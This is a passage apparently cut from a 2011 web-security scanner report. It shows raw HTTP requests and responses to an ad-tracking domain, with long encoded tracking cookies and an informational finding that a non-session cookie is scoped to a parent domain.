2w3usemfYqo/LC5TaKi5ajd3TraAoPSRO5HqZ2PwdFUdNvXQiciSdns4tK8tAK07EO4EWFlmuyUMC/W77sBv0XgGOnB4BaKeCyTpYLW26FYdGwuaehBKDdZqrtw+wk53hSMyB0CkhnOSXlCRSjkjtCCqAstyxpXxSKpgPXVUUbrpRtHJoYKqsBbMVz13cGKR3mmsvOOGnOxNrVzqX0pyD+WsHCz1UZ3E8OADtUIQq6Un8HBGydRzyy7h0Q6FFGrKZ8ygkLBiNFQ96gZld4LkwZm0nIyhEI8eLbZizqT9LOP6RbSFtXmhbZLYoFFok60OMk211eTo35TjkHEiTb6fQe+fOWc6KZvaAPN1NM+lVkji+hlLNmJcOITMt6yh0t8bgTporFXO5bpCO3Ktpubfkkg2GAeoO56XChlX+sbNIlwr9UlurYTqsC0BQwYjYIi6uljWZ8xIM0; udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQbiYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==; rsiPus_feb9="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyOT+GUT9nKm6Uzd+LKjcZyqckugFnBiR0Zn/IsFdk0/rFRTV9qpAPalIhg6ctdKRDh0s/thiFDr8zSnOiJzdlLV+GP4C0aP3dFLRyc6fD3eGZF5paPafjW8xN/6f61iDbn5Scf4ENowP7/1SoiwONbYeu6xZ2hfIMUOAP0wYi5HYzKJgrBhF1IX9Zd5O2Lmz0H8o1YhUZ/xNsWLqnbPSclagg1uZdIaEEX2X7mU9PpvkuJOErL8VIsMtmNeV8SkFkjFUOet0KGm5k8I/lS57L9061i+BOKKiB821tSxmzJvLeZjNqwNOktGg05gpiheC/gX34NVB3rHtCa9gdCWhoGBjXZ3Vek0xPaJoM2vQggaeofJWjtEizseUAZ8DqB3Bpvl+Q/ml47cZ0lKw7LawXyD58UNXC+2xj1oRnibe6D3B6lsMl4e22RyFZmDR/wOywu2mQO0J9hOUdK+nxEJozkuDVSbShPypBC8wJaxkeC1d41hzQM4nFlVLgxRcm5VUb+1qf+/lRdlarNizuUBS3eo7geSrmwmp6exVCwVOlj2Jj9fP7BnHPXwJ6dP7KZGbHV8En9dfBTXYwWNTvYgYB0GCPL/kkLLy6LUuk48I5Z8DCPCP3tSYk5a3xRXRYElTnYs44OJZ5L5mDPYj0iANpHQO1GLTP1KwhMnVobAuCAHWLm+4VbxffA3CBtNvKLlD/eF/gh5Wod9cqvBiz1hWTb4ij8COotPmMZcvatmS+hAlW9NvQ+GlR3LFrwx9U+2LONu5piZm6OS4EGsv1cip2BRmgE3yUIBr0q2bfQHwV8zdQzhThHV+MbBRAr2AebL+QcAIdxhTgx7JRKxi78B2nJxMoeJWcbPhr/XUIFqDTIthwHCAaAOn7NcAgDUsPznPOHwK62Y2m2wTSVt2bLefzLQrJsgwvV1ckk6OEkoK+K+oMHP390MTlJ6WZKDNPwPIitLRLuNkCr4NNOtgTNHeOehpjGXbCJn/lx1EAfOT9CRrt/F7ACN11dFiLoKmLbYt+lGtiaDq8E1KHPwNqbKR4pWoNzDoCopSiRYRtZD0Ft8IVgJioAjQ13lkHzlURVaOS50U7/4pN4X6i+A+lEz9OikZ1cOVXnRB9R6iyRafnQwrF/CtuR2+gMIjH7yc8soS/mvr9OcOyaNc6cmvTvza7q7WzE7OVGXcqHdC7x6MOkpZyDWhdtS0/OngDWbqYoAwJYpdiyIl1ijllxC4BtQR1dQ98cyYX/4NTwupjWmJACf4Kiw2z+NZXDXEseCmsCSBnARs0RKdPBkBBp7hjHFHKYmmSu9f6e+2ou02jTP8i1fC0GiKn8WlIPQl+P88osPPlstYfuy1877JO+Aq2okYoZqHk/ZQlwR8xUD9RPH8bTf7BU+eXH3xJq0K22dYC5plTYC4BgxUGVWnSwaeyypAv2r+561/B3gCB3gWwWPSZUvs76UJtUVeF7CblPshXTNoZC0YBMuVqFveGNrPuHEXdO0eMCUFxC6EBHId3CNr1Mt5iGiBtNQ=="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jOhOHMMH/CFfyFZ5hD9CU6do67BSgtgzWLK0cp566K2jLwzIRCIvylf4jXnXP+nYXfLWPrrGpnpaNZYHJ1HHqZT8VuypYmSEFZqKHipd3aEwUhBo+mqE5zXET/h0klTCO9quapUf84+RmhVKJgALVfezSf6cGLHRLqvYIQjT0kZECrrMnXA61RhpDsiQy8dcK/k7n1qfz3YC3yT7etQaMISozANh3vt+h0w5Ovdc+9BKxyVFaO/wTDXwDhV1ddBUJ76LLVvrhhAtAVLDpe1QuW+7UWcc18GifYdM1blY9oSwaISLoiEnn9Wz6vPio3OQB1vIOCu3lM3HLnhiEc3h1+e16CEwmxW8MNE50h5hbd3zFCAa09+LTEEB1RTC3QIR16NfHLy3I3DPw2HO9V+T3KCfhRH7Rg8tutSR9MbJsLBQt7wRFY4b7pt+OSRflmO4pYi0UuQzePGvo19Y8IUuUV/zOjE1mQfOKK7DopTL+CsWEWUSJe8bpmC9Rd8/nTV2P/01Z63CBvueh2hEAMypvqNGRLM9cAA7yQ66kbISCTJfF8PdqmoFwvNb2+q/Q1Fi7eDooDJAAkg894vEe0b//ngn1SENv8WVi7s/QeaYOnEa55YqmlqyDzADnokGFhzq7R8gFjRjefRSiaq5PK0sTx2Mq3hqMi8kZ3QSboUD02pD6aTSPxlx7HptL76Cb3+302TH/EMRNaSGk9pll5Z3oocznWfi1sFhdN0pzfrnt5tG6R8eyHY6EP7re6Oy374; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3hepL5u85DdJSwns63EnKfX2nh8cWigJwgSuviYqkQXc89yvIeq9+M8WRtyXBOh9HXIAUS4g+2BN2COW4LBvc3ZVyH5QJHJ9JlA5kaOwaneDKCp6W6nRvKxjoLa+84C9EswWzlqVOZx3Pe+iT7uvOO2UmYgAIvXe2xeoUZXx7GgIX0hYmiAS1KK52oofEk69n+/2zO1WPujuU+nVEV6xlw3DA9vTuj2OXbf94Odr80dMBNmeAaMfnpuAg8XR3mEVTQemosaYLVED7cDgyGAFyV5jSqpmW2ZyPgafSd1iAX0Ez6Z45DWgSHO1alQm1K8I4b8/nwPzag42qICFBZDyl1zqzkL/iGAJt8X0iANCqb0G+3jwnnQkZ11WyWA+7hHnnytRYiyNq+ZP2WMVOznpi0bP1BZzgnwCI+neNQQ7yMtALEzl5AZBVftrS44LsIeH8Kv/qcjQYKB0ZWI88v+gaNLRVyeyrNPnFHb8SGftVF6qRffReEsI9/yM3HweOU6SwigjIT81Ff97T0Ftxpc5J7yeQTeILjgZWjaQnDihOjYx6885VNGtb7nQRPdxVQjL6M4DAu/5RO2vmeANOhYGYGMsbyuxCkriR4pziSXX67UTNKaIMwWnc06IQUPunqaV4UE8RvNq++Lpkrh9+1ZMeOMemnIrt3nFPjo6GDOGsLagycIEu3AIiM3kjZwsoHehLHdFkoPXjNOcg9G72o2vMzc1qYZRA2+zGgkfG8IziLRU0TNM++7tzhOU94r2SKPtrr68L6Eha1lGsbyV28/mjf+N7XhDL2n0eiJIpDgwzPSKaVkpFYnbK8WKz4dx4wCRADaanjv7gOcCF55UYjgRlJX/vNjHM6kWP9P8lCN6qMwfdHdJn4XNtJVdtcegph6wQ86wBERfribSPog6hU8XD8zOAV+X0NTXGvsPMlWrA6t2B+1aj5Np3h3J+RQfPxlm1xpHrTUwceZAQRgv3+6Y083L2UXZAxnZoo5jHRCe4UpAHFW3i4Ij5buFivhOoJ+61mUI6S3Y1LM84UcS84ZIfXkKhjf0ozZp1mYUEE2QGvOxbmrXFz/2IkSYgCXmXZTmPMkX+tFRct4/4yOCCgY4SMmhgrDi0+8lGx0CxL5lMNi4EbwIKTfFA+xsWwxLqbym/GHWjF2RqL1IIXGlNbS4MV+yRUV/BQsdepAb4mauU4GBCH2gNjzGFBtF5sHZtb0qbqMotK/Ad6qJ4nEFC13nkBu6QW3P4Au5oJQJP0qSM0YVXbbtq8mUBxf8ToEioahQIrPYjNOz1XIuPdNGO9pZ177Em8pstn02a04vRy4hUFFsbfkM8ricaS/vWyB09JBiM99JQdqgtkBdNXwwI4fxYPJuFsA8i8qJO3WL0xQ8OToYp4TOssG1giQRXBCOcuebW++WI8DImL69geiAN/Xu1TKkrChFhlZ2E4jTzgnA2NJHiEIMFqiD1GtNBCz1cFO9p9DSZjwdV1Vj677EGkwP5m2Z1knEBN1Jdis2oTIYhE7mwm9EWLOCmODdZtkBd9+rAdC5o3CttbVsMhClh1R4czt9np/0wuBinHRjpCo9fZp+AwfQGfIa5+Wz1yBM24afElvE+unPmmNYdrBiRTAHXc/pU4jTm/gHIt2BN7PofAeMT3yBhWsPDgjYgOtNXJBrwNcZt0bUuSJjcigK094nvOhdbcH4dYGoChnibu/Y96JzuyUL25IYblD299R/B11cNdwtI7cnEiJGWHve7Sxiv3IoWALmq30vTDzqO6qLBv3kL33URsedu+bv+n59ttgXFOLmwiPYbtIGk4I=; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 14:01:09 GMT

GIF89a.............!.......,...........D..;

9.27. http://pix04.revsci.net/G10937/a4/0/0/0.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /G10937/a4/0/0/0.302

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /G10937/a4/0/0/0.302?tgt=http%3A%2F%2Fib.adnxs.com%2Fseg%3Fmember%3D514%26add_code%3D%7Bsegs%7D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; rsiPus_TE1N="MLsXtTENJApvJ5EkOsXUOAMIrN7cVDsRAI1JlA2+kP2O+rpZrFxjRJpWO95J9jw2ez7PuZwvYpKzPZnmx73e3+g+RBhF6m2qS5qlx6y79pJEUaqR3iscgzeYYjYHE4zarxjYFkAK699GLRvC/lOpNi3oKjSDUjQz6bRd5RumVseON9retzHXthkJz7rmg/AoXcHq/5pWJqRHvxa4sjMtfKPaDQ33n2MzatS1JHKj3inoOBwKFOrUvo8YaYkbDBX35ir0cxEU/FuG0/p0o7qD+/iAZjMCOEMSy6LFwfP/J639cuKKTM9hCsXY7SRInhwCovfpF72sRVZjw87NKbbB5Qql0y6OOGyQHjmdqnB673xTTed/W8l8FYytBOFCjfyyAn+9fAsQpGJACvABUg65KeD2WZxuUkW8tcwRvHrD8CCkEjJAiJaJ82KVgPv/NORGeWc9yQYH8J8DvtXM30s4lrbgRaOIuDlgmpCQPyY96wRUB5WctGJ5ukZ+VdijEsGEXKuAkODAAvCZgyZdj8pk/yhkS0E5DWzwQNhbMQqx9ZcSOd2BRF73UX97YK9Y2LBhI5D5YdW6AxIcxgZ75K3YEm2jyg8wVYiegYI4koi6fjSUGpU/aclERWBbApHsM8wQvxy/xAjqz5YU6sjueUp2EQCgOSizhocs/l635dkgU41sM3QM4vfW+yqPZggnyj4CCBDgYunklnGSR1uUwhJ5hDMoOqLrb5l6iy7ocKWjGp4dHvAEKwJ9W7MtSY1f41qRjmHDNW9/r6Q8aJUKpTJDmtMSHptJB5b7H/DyCI9h2P2Jc53oHYsuhzMyCqTEHsZ1NHiZncWyXVikqCft8J5KWWMaHRDZJ4xrlnYbg9QbfDpW13lV2wfIa5JYPZCAicT6d7jumtyAidZ9MhQT3qWk+vU2eX/ch32cEA3iYr2o27vwbqcnfZMKtZLUqKawF9qclwanTscXsJVIuz+EFY2T/cgVP6dGTkX0PEfzwfQto1hHpBtSU+5CiN7tPVfU3EWnub4+QSFEOUm98aAA9rwkukyqI0H52kYMKTrOExsDgc4HCR3ZpaW/yqUqrkZtHgwrPXhRSgzmUynN1lnLdZIdNR1ojLIOQfdCYDd8YoVzuIGzZBAACC754kxcTZjDmurWrZoeWjI2k4sycb8WveRTIGNS0tCpCEnvVK6DRSZeRPZ94F89r62QMAUaW0jXDnDKORbKBvUUy2WvWoaGLHNMjts8k4qt7Pta2W9Yam9cirruDGatLKblpOHKBcIUQK0tZfcSJIXU/LdkOfqtbzkELtKtuTyGXEnQxPmL98WMjfKPjd9BbcZfBwr+okep4nH+ENdSMYVP/LRqrdQdRIpj3oIsiVfqfv5kuG3oAA0+UypOfQ/LDMyvu1OeQgp7zfqCKAW9gNK3JnMhNNyF2y+GB3/bTOyaIWb9WyJTQ6FZp0Lp4mbDTa0xbsVieWfPhWs1ui+rGo+GHkveFJJKHiuHlJ/yTOvZNAA4cv9yWcaSVCbV9gfI/liUeuPq30bAU6XE+IFUECA8aiAUIfwBYuEgbzMkZpqjj8XvpIGujHXxiCPL"; 